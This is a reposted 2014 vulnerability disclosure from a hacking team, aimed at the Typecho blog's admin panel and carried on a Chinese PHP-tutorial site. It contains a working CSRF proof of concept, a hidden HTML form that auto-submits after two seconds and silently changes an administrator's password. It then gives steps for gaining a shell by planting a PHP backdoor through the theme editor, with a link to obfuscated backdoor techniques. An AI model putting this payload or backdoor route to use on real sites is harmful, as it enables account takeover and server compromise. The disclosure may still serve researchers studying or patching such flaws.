来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] We enjoy hacking of life in day and night _______________________________________________ [+] HSID: FF000-HSDB-0002 [+] Author: Evi1m0...
|
We enjoy hacking of life in day and night.
_______________________________________________
[+] HSID: FF000-HSDB-0002
[+] Author: Evi1m0 <evi1m0.bat@gmail.com>
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
[+] Create: 2014-06-22
_______________________________________________
-= Main =-
[*] 1. Description
http://typecho/admin/profile.php page, Change password form CSRF vul.
http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.
[*] 2. CSRF POC
<div style="display: none;">
<form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="password" value="bug1024"/>
<input type="hidden" name="confirm" value="bug1024" />
<input name="do" type="hidden" value="password" />
<button type="submit"></button>
</form>
</div>
<script>
setTimeout("document.ff0000team.submit()", 2000);
</script>
[*] 3. GETSHELL
http://typecho/admin/theme-editor.php page, Write backdoor.
Or, Write this: http://www.hackersoul.com/post/PHP中使用按位取反函数创建后门.html
-= END =-
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
